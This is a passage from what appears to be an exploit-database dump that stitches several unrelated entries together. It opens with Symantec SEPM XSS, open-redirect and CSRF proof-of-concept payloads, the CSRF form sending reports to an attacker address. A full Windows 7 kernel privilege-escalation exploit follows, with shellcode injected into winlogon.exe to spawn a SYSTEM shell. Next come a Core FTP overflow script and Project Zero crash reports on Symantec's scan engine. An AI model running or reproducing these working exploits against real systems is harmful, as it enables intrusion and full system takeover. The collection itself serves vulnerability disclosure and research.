these vulnerabilities requires access to the SEP Management console.
References:
============
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_01
Exploit code(s):
===============
In this case XSS can bypass the "http-only" cookie protection because the
SEPM application writes and stores the session ID within various
javascript functions used by the application within the DOM thereby
exposing them directly to the XSS attack.
1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm
So all we need to do is alert(createModalDialogFromURL) anyone one of them
(functions) an it will leak the session ID essentially throwing the
HttpOnly secure cookie protection flag into the garbage.
e.g.
XSS POC Defeat http-only flag and access PHPSESSID:
https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1&Type=CR&height=alert%28createModalDialogFromURL%29#
Open Redirect in external URL .php script:
=========================================
A reporting URL used to route generated reports externally to any
authorized URL is susceptible to an open redirect vulnerability
that could have allowed an authorized but less-privileged user to redirect
an unsuspecting privileged user to an external URL to
attempt further exploitation, e.g. phishing.
If a victim clicks on a link supplied by an attacker
e.g.
https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
Cross Site Request Forgery (CSRF):
==================================
Multiple Cross Site Request Forgery exists in couple of places within this
version of SEPM below is an example of sending scheduled report to
an remote attackers email, if current logged in user visits malicious
webpage or clicks infected link etc...
Symantec Reporting Admin CSRF POC:
<form id="PWN" action="https://localhost:8445/Reporting/Reports/sr-save.php"
method="POST" />
<input type="hidden" name="ReportName" value="HELL" />
<input type="hidden" name="Description" value="PWNED!" />
<input type="hidden" name="DisableReportSchedule" value="on" />
<input type="hidden" name="NewReport" value="Y" />
<input type="hidden" name="reporttype" value="1" />
<input type="hidden" name="FILTERNAME" value="Default" />
<input type="hidden" name="runEvery" value="1" />
<input type="hidden" name="repeat" value="weekly" />
<input type="hidden" name="datesched1" value="02%2F10%2F2016" />
<input type="hidden" name="datesched2" value="02%2F10%2F2016" />
<input type="hidden" name="filHourSchedule" value="16" />
<input type="hidden" name="Schedulehour" value="16" />
<input type="hidden" name="filMinSchedule" value="56" />
<input type="hidden" name="Scheduleminute" value="56" />
<input type="hidden" name="sysadmin" value="off" />
<input type="hidden" name="sendto" value="evil@abyss.com" />
<input type="hidden" name="updatelastrun" value="0" />
<input type="hidden" name="HISTORYCONFIG_IDX" value="" />
<input type="hidden" name="ReportPrefix" value="Y" />
<input type="hidden" name="report_idx" value="Y-0" />
<script>document.getElementById('PWN').submit()</script>
</form>
Disclosure Timeline:
============================================
Vendor Notification: Febuary 11, 2016
Vendor Acknowledges Report: Febuary 12, 2016
Vendor Releases Fix: June 28, 2016
June 29, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level(s):
====================
Cross Site Scripting
Medium
v2 6.8
AV:A/AC:M/Au:S/C:C/I:C/A:N
v3 6.7
AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Cross Site Request Forgery
High
v2 7.0
AV:A/AC:M/Au:M/C:C/I:C/A:C
v3 7.1
AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Open Redirect
Medium
v2 4.1
AV:A/AC:L/Au:S/C:P/I:P/A:N
v3 4.1
AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
Source: https://github.com/Cr4sh/ThinkPwn
Lenovo ThinkPad System Management Mode arbitrary code execution exploit
***************************************************************************
For more information about this project please read the following article:
http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html
This code exploits 0day privileges escalation vulnerability (or backdoor?) in SystemSmmRuntimeRt UEFI driver (GUID is 7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E) of Lenovo firmware. Vulnerability is present in all of the ThinkPad series laptops, the oldest one that I have checked is X220 and the neweset one is T450s (with latest firmware versions available at this moment). Running of arbitrary System Management Mode code allows attacker to disable flash write protection and infect platform firmware, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do others evil things.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40040.zip
/*
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : 2016-0400
MS16-014 EoP PoC created from
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights.
Overwrites HaliSystemQueryInformation, but does not replace it, so BSOD will occur at some point
********* EDB Note *********
ntos.h is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40039.zip
***************************
*/
#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#include "ntos.h"
#include <TlHelp32.h>
typedef union {
HANDLE Handle;
ULONG64 Handle64;
ULONG32 Handle32;
}
HANDLE3264, *PHANDLE3264;
typedef struct {
ULONG HandleCount;
ULONG Action;
HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback;
HANDLE3264 UserModeProcess;
HANDLE3264 Handles[20];
}
WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;
#define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring
typedef struct {
IN VOID * ObjectAttributes;
IN ACCESS_MASK DesiredAccess;
OUT HANDLE3264 Handle;
}
WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef struct _DESKTOPINFO
{
/* 000 */ PVOID pvDesktopBase;
/* 008 */ PVOID pvDesktopLimit;
} DESKTOPINFO, *PDESKTOPINFO;
typedef struct _CLIENTINFO
{
/* 000 */ DWORD CI_flags;
/* 004 */ DWORD cSpins;
/* 008 */ DWORD dwExpWinVer;
/* 00c */ DWORD dwCompatFlags;
/* 010 */ DWORD dwCompatFlags2;
/* 014 */ DWORD dwTIFlags;
/* 018 */ DWORD filler1;
/* 01c */ DWORD filler2;
/* 020 */ PDESKTOPINFO pDeskInfo;
/* 028 */ ULONG_PTR ulClientDelta;
} CLIENTINFO, *PCLIENTINFO;
typedef struct _HANDLEENTRY {
PVOID phead;
ULONG_PTR pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
}HANDLEENTRY, *PHANDLEENTRY;
typedef struct _SERVERINFO {
DWORD dwSRVIFlags;
DWORD64 cHandleEntries;
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
}SERVERINFO, *PSERVERINFO;
typedef struct _SHAREDINFO {
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize;
ULONG_PTR pDispInfo;
ULONG_PTR ulSharedDelta;
ULONG_PTR awmControl;
ULONG_PTR DefWindowMsgs;
ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);
DWORD g_HalDispatchTable = 0;
void* kHandle;
HWND g_window = NULL;
const WCHAR g_windowClassName[] = L"Victim_Window";
WNDCLASSEX wc;
PSHAREDINFO g_pSharedInfo;
PSERVERINFO g_pServerInfo;
HANDLEENTRY* g_UserHandleTable;
LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
DWORD getProcessId(wchar_t* str)
{
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
DWORD PID;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap);
return 0;
}
do
{
if (!wcscmp(pe32.szExeFile, str))
{
wprintf(L"Process: %s found\n", pe32.szExeFile);
PID = pe32.th32ProcessID;
return PID;
}
} while (Process32Next(hProcessSnap, &pe32));
return 0;
}
void Launch()
{
void* pMem;
char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x00";
wchar_t* str = L"winlogon.exe";
DWORD PID = getProcessId(str);
HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
BOOL leakHal()
{
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
PRTL_PROCESS_MODULES pModuleInfo;
DWORD ntoskrnlBase;
DWORD HalDTUser, HalDTOffset;
HMODULE userKernel;
pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pModuleInfo == NULL)
{
printf("Could not allocate memory\n");
return FALSE;
}
NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
if (userKernel == NULL)
{
printf("Could not load ntoskrnl.exe\n");
return FALSE;
}
HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
HalDTOffset = HalDTUser - (DWORD)userKernel;
g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
return TRUE;
}
BOOL setup()
{
LoadLibraryA("user32.dll");
wc.cbSize = sizeof(WNDCLASSEX);
wc.style = 0;
wc.lpfnWndProc = WProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = NULL;
wc.hCursor = NULL;
wc.hIcon = NULL;
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
wc.lpszMenuName = NULL;
wc.lpszClassName = g_windowClassName;
wc.hIconSm = NULL;
if (!RegisterClassEx(&wc))
{
printf("Failed to register window: %d\n", GetLastError());
return FALSE;
}
g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
if (g_window == NULL)
{
printf("Failed to create window: %d\n", GetLastError());
return FALSE;
}
g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
g_UserHandleTable = g_pSharedInfo->aheList;
g_pServerInfo = g_pSharedInfo->psi;
return TRUE;
}
DWORD leakWndAddr(HWND hwnd)
{
DWORD addr = 0;
HWND kernelHandle = NULL;
for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
{
kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
if (kernelHandle == hwnd)
{
addr = (DWORD)g_UserHandleTable[i].phead;
break;
}
}
return addr;
}
VOID SprayKernelStack() {
g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
if (ZwMapUserPhysicalPages == NULL)
{
printf("Could not get ZwMapUserPhysicalPages\n");
return;
}
BYTE buffer[4096];
DWORD value = g_HalDispatchTable - 0x3C + 0x4;
for (int i = 0; i < sizeof(buffer) / 4; i++)
{
memcpy(buffer + i * 4, &value, sizeof(DWORD));
}
printf("Where is at: 0x%x\n", buffer);
ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}
__declspec(noinline) int Shellcode()
{
__asm {
mov eax, kHandle // WND - Which window? Check this
mov eax, [eax + 8] // THREADINFO
mov eax, [eax] // ETHREAD
mov eax, [eax + 0x150] // KPROCESS
mov eax, [eax + 0xb8] // flink
procloop:
lea edx, [eax - 0xb8] // KPROCESS
mov eax, [eax]
add edx, 0x16c // module name
cmp dword ptr[edx], 0x6c6e6977 // �winl� for winlogon.exe
jne procloop
sub edx, 0x170
mov dword ptr[edx], 0x0 // NULL ACL
ret
}
}
int main() {
DWORD dwBytesReturned;
HANDLE threadhandle;
WMIRECEIVENOTIFICATION buffer;
CHAR OutPut[1000];
if (!setup())
{
printf("Could not setup window\n");
return 0;
}
PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
kHandle = (void*)leakWndAddr(g_window);
memset(userSC, 0x41, 0x1000);
memcpy(userSC, Shellcode, 0x40);
if (!leakHal())
{
printf("Could not leak Hal\n");
return 0;
}
printf("HalDispatchTable is at: 0x%x\n", g_HalDispatchTable);
DWORD value = (DWORD)userSC;
PBYTE buff = (PBYTE)&buffer;
for (int i = 0; i < sizeof(buffer) / 4; i++)
{
memcpy(buff + i * 4, &value, sizeof(DWORD));
}
printf("What is at: 0x%x\n", buff);
buffer.HandleCount = 0;
buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
buffer.UserModeProcess.Handle = GetCurrentProcess();
HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDriver != INVALID_HANDLE_VALUE) {
SprayKernelStack();
if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
return 1;
}
}
_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
ULONG result;
KPROFILE_SOURCE stProfile = ProfileTotalIssues;
NtQueryIntervalProfile(stProfile, &result);
printf("SYSTEM shell comming\n");
Launch();
printf("All done, exiting\n");
return 0;
}
'''
# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC
# Date: 2016-6-28
# Exploit Author: Netfairy
# Vendor Homepage: http://www.coreftp.com/
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
# Version: 2.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
[+] Type : Buffer overflow
[+] Detail :
[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
[-] enter the application and Input "A"*800 to the path box the press enter
[-] crash info
0:008> g
(4d48.4cc8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00440770 ecx=00410041 edx=007c4ee4 esi=00000000 edi=01b1efe8
eip=00410041 esp=0012d6a0 ebp=00410041 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\CoreFTP\coreftp.exe
coreftp+0x10041:
00410041 008b45fc8be5 add byte ptr [ebx-1A7403BBh],cl ds:0023:e5d003b5=??
########generate "A"*800
'''
import struct
junk = "A" * 800
with open("exp.txt","wb") as f :
f.write(junk)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=823
A PowerPoint PPT file is a complicated OLE compound document comprising of a series of streams. The format is described by Microsoft in [MS-PPT].
https://msdn.microsoft.com/en-us/library/office/cc313106(v=office.12).aspx
Symantec have implemented an I/O abstraction layer for seeking within the streams of a compound document, which they use to extract embedded objects like VBA macros and so on. Unfortunately, a bug in this I/O abstraction results in a critical security vulnerability. The bug occurs when a read request can be satisfied from the cache, but from a non-zero start offset. In this case, the request size is always rounded to (CACHE_SIZE - Offset), which may not be correct.
For example, a read request that can be satisfied from the stream cache in these ways:
+-------------------------+
| CACHE |
+-------------------------+
1. <---------> Non-zero offset, but entire cache needed.
2. <------> Zero offset, but not the entire cache.
3. <----------------------> Entire cache.
4. <----> Non-zero offset and not entire cache.
All of these cases work fine except 4, where a buffer overflow occurs, because the request is rounded up to (CACHE_SIZE - Offset). It seems incredible that this bug wasn't found during testing or even on ITW documents just by chance. Nevertheless, by carefully constructing a powerpoint file with a series of records that massage the cache with a series of records, we can trigger a stack buffer overflow of attacker controlled data.
The easiest way to do this is via PPFindRecSet in libdec2ss (this is part of ccScanw.dll on Windows). Early on when processing powerpoint documents Symantec attempt to find the last edit via RT_UserEditAtom, then extract a set of records for RT_List and RT_ExternalObjectList allowing us to massage the stream cache appropriately.
Naturally, Symantec disable /GS on Windows and do not use -fstack-protector, making exploitation absolutely trivial. The attached document redirects execution to 0x41414141 reliably on Windows.
0:065> g
(1074.a14): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=000025a0 ecx=00000200 edx=000025a0 esi=0396e358 edi=00002524
eip=41414141 esp=056df558 ebp=00000000 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:065> lmv m ccScanW
start end module name
65820000 65a4f000 ccScanw (deferred)
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
The fix is simply to round up requests to MIN(RequestSize, CACHE_SIZE).
I verified this bug exists on the following products:
* Norton Antivirus (All Platforms)
* Symantec Endpoint (All Platforms)
* Symantec Scan Engine (All Platforms)
* Symantec Email Security (All Platforms)
And probably all other Symantec and Norton branded products.
NOTES:
PPGetVBAEmbedListInfo() uses PPFindRecSet(), which is definitely the easiest way to exploit this. The prototype is something like:
int PPFindRecSet(tagSS_STREAM *stream,
unsigned StartOffset,
unsigned EndOffset,
short count,
short *RequiredRecordTypes,
unsigned *RecordOffsets,
int *RecordLengths);
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40037.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=821
A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. Simple fuzzing of zip archives discovered missing bounds checks in the routine ALPkOldFormatDecompressor::UnShrink, used to decode Zip archives.
The routine uses a 16bit value read from the file to index a 256 element array without any bounds checking, the attached testcase should demonstrate this reliably. I have verified this on the following products:
Norton Antivirus, Windows
Symantec Endpoint Protection, Linux and Windows
Symantec Scan Engine, Linux and Windows
(534.700): Access violation - code c0000005 (!!! second chance !!!)
eax=00003000 ebx=00003000 ecx=00003000 edx=00002000 esi=16adeb58 edi=16ad8b1b
eip=6ba47ec3 esp=16ad6af0 ebp=16adeb20 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
ccScanw!filelengthi64+0x3af63:
6ba47ec3 66399445fcbfffff cmp word ptr [ebp+eax*2-4004h],dx ss:002b:16ae0b1c=????
0:071> ub
ccScanw!filelengthi64+0x3af3f:
6ba47e9f 8bb5ec7fffff mov esi,dword ptr [ebp-8014h]
6ba47ea5 8bc7 mov eax,edi
6ba47ea7 8985e07fffff mov dword ptr [ebp-8020h],eax
6ba47ead e96d010000 jmp ccScanw!filelengthi64+0x3b0bf (6ba4801f)
6ba47eb2 0fbfc3 movsx eax,bx
6ba47eb5 ba00200000 mov edx,2000h
6ba47eba 8dbdfb9fffff lea edi,[ebp-6005h]
6ba47ec0 0fb7cb movzx ecx,bx
0:071> lmv m ccScanw
start end module name
6b930000 6bb5f000 ccScanw (export symbols) C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40036.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=819
Simple fuzzing found an integer overflow in the dec2tnef library. This allocation from Attachment::setDataFromAttachment() doesn't verify that the attacker controlled value doesn't wrap:
.text:000227B8 8D 42 01 lea eax, [edx+1]
.text:000227BB 89 85 68 FF FF+ mov [ebp+var_98], eax
.text:000227C1 8B 83 CC FF FF+ mov eax, ds:(_ZSt7nothrow_ptr - 42CFCh)[ebx]
.text:000227C7 89 44 24 04 mov [esp+4], eax
.text:000227CB 8B 85 68 FF FF+ mov eax, [ebp+var_98]
.text:000227D1 C1 E0 02 shl eax, 2
.text:000227D4 89 04 24 mov [esp], eax
.text:000227D7 89 95 5C FF FF+ mov [ebp+src], edx
.text:000227DD 89 8D 58 FF FF+ mov [ebp+var_A8], ecx
.text:000227E3 E8 54 22 FE FF call __ZnajRKSt9nothrow_t ; operator new[](uint,std::nothrow_t const&)
That's (count + 1) * 4, without any checking that will succeed. The attached testcase reaches this code on Symantec Scan Engine, I'm not sure which other products use this code.
(gdb) bt
#1 0x07e88816 in Attachment::setDataFromAttachment(Item&) () from definitions/Decomposer/libdec2tnef.so
#2 0x07e88abc in Attachment::setAttribute(Item&) () from definitions/Decomposer/libdec2tnef.so
#3 0x07e8a1b4 in TNEFObject::getAttachments(_IO_FILE*, MList&) () from definitions/Decomposer/libdec2tnef.so
#4 0x07e6c1d6 in CTNEFArchive::Open(char const*) () from definitions/Decomposer/libdec2tnef.so
#5 0x07e6ae5f in CTNEFEngine::OpenArchive(CTNEFArchive*, bool*) () from definitions/Decomposer/libdec2tnef.so
#6 0x07e6b8c0 in CTNEFEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from definitions/Decomposer/libdec2tnef.so
#7 0x063d07b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
#8 0x063d13cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40035.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=818
Symantec attempts to clean or remove components from archives or other multipart containers that they detect as malicious. The code that they use to remove components from MIME encoded messages in CMIMEParser::UpdateHeader() assumes that filenames cannot be longer than 77 characters.
This assumption is obviously incorrect, names can be any length, resulting in a very clean heap overflow.
The heap overflow occurs because Symantec does the cleaning in multiple stages, first changing the Content-Type to "text/plain", then changing the filename to "DELETED.TXT". The problem is that during the first stage of this process, they maintain the existing name but use a buffer prepared for the final name.
Something like:
char *buf = malloc(strlen(NewContentType) + strlen(LengthOfNewEncodedFilename) + 100)
// First change the content-type
strcpy(buf, "Content-Type: ");
strcpy(buf, NewContentType;
strcpy(buf, "; name=\"");
strcpy(buf, OldFileName);
...
UpdateName(buf, NewFileName);
...
This obviously won't work, because it doesn't verify that the old name will fit. I've attached an example MIME message that triggers this code in Symantec Scan Engine.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40034.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=810
A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. It is self-evident from looking at the decomposer code that Symantec have based the RAR decompression on the open-source unrar package from RAR labs (Note: this is permitted by the unrar license).
By comparing Symantec's code to the open source code, I have determined that Symantec are probably using version 4.1.4 of the unrar code, released in January 2012. The most current version is version 5.3.11.
Between the version of unrar that Symantec runs as NT AUTHORITY\SYSTEM to unpack untrusted binaries received over the network and the the current version, literally hundreds of critical memory corruption bugs have been resolved.
I have verified that multiple publicly known vulnerabilities affect Symantec, and can result in remote code execution as NT AUTHORTITY\SYSTEM on Windows and root on Linux and Mac.
I have verified this on the following products:
Norton Antivirus, Windows
Symantec Endpoint Protection, Linux and Windows
Symantec Scan Engine, Linux and Windows
Presumably this affects all other Symantec products using the core Symantec scan engine.
In my opinion, I'm being exceptionally generous considering this issue a new vulnerability and not public information. Frankly, it is astonishing that Symantec do not track new releases of third party code they use. I think you should take this opportunity to check all other third party code you're using to verify you haven't fallen behind.
I've attached a trivial example that modifies an arbitrary index in the PlaceA[] array via Unpack::ShortLZ().
(534.adc): Access violation - code c0000005 (!!! second chance !!!)
eax=14858d00 ebx=07da63e0 ecx=07da65ec edx=fb6e43a0 esi=07da6370 edi=daf72217
eip=6d7b4016 esp=0da8d260 ebp=0da8d27c iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
ccScanw!filelengthi64+0x470b6:
6d7b4016 8994be005d0000 mov dword ptr [esi+edi*4+5D00h],edx ds:002b:73b748cc=14858d00
0:052> lm v mccScanw
start end module name
6d690000 6d8bf000 ccScanw (export symbols) C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
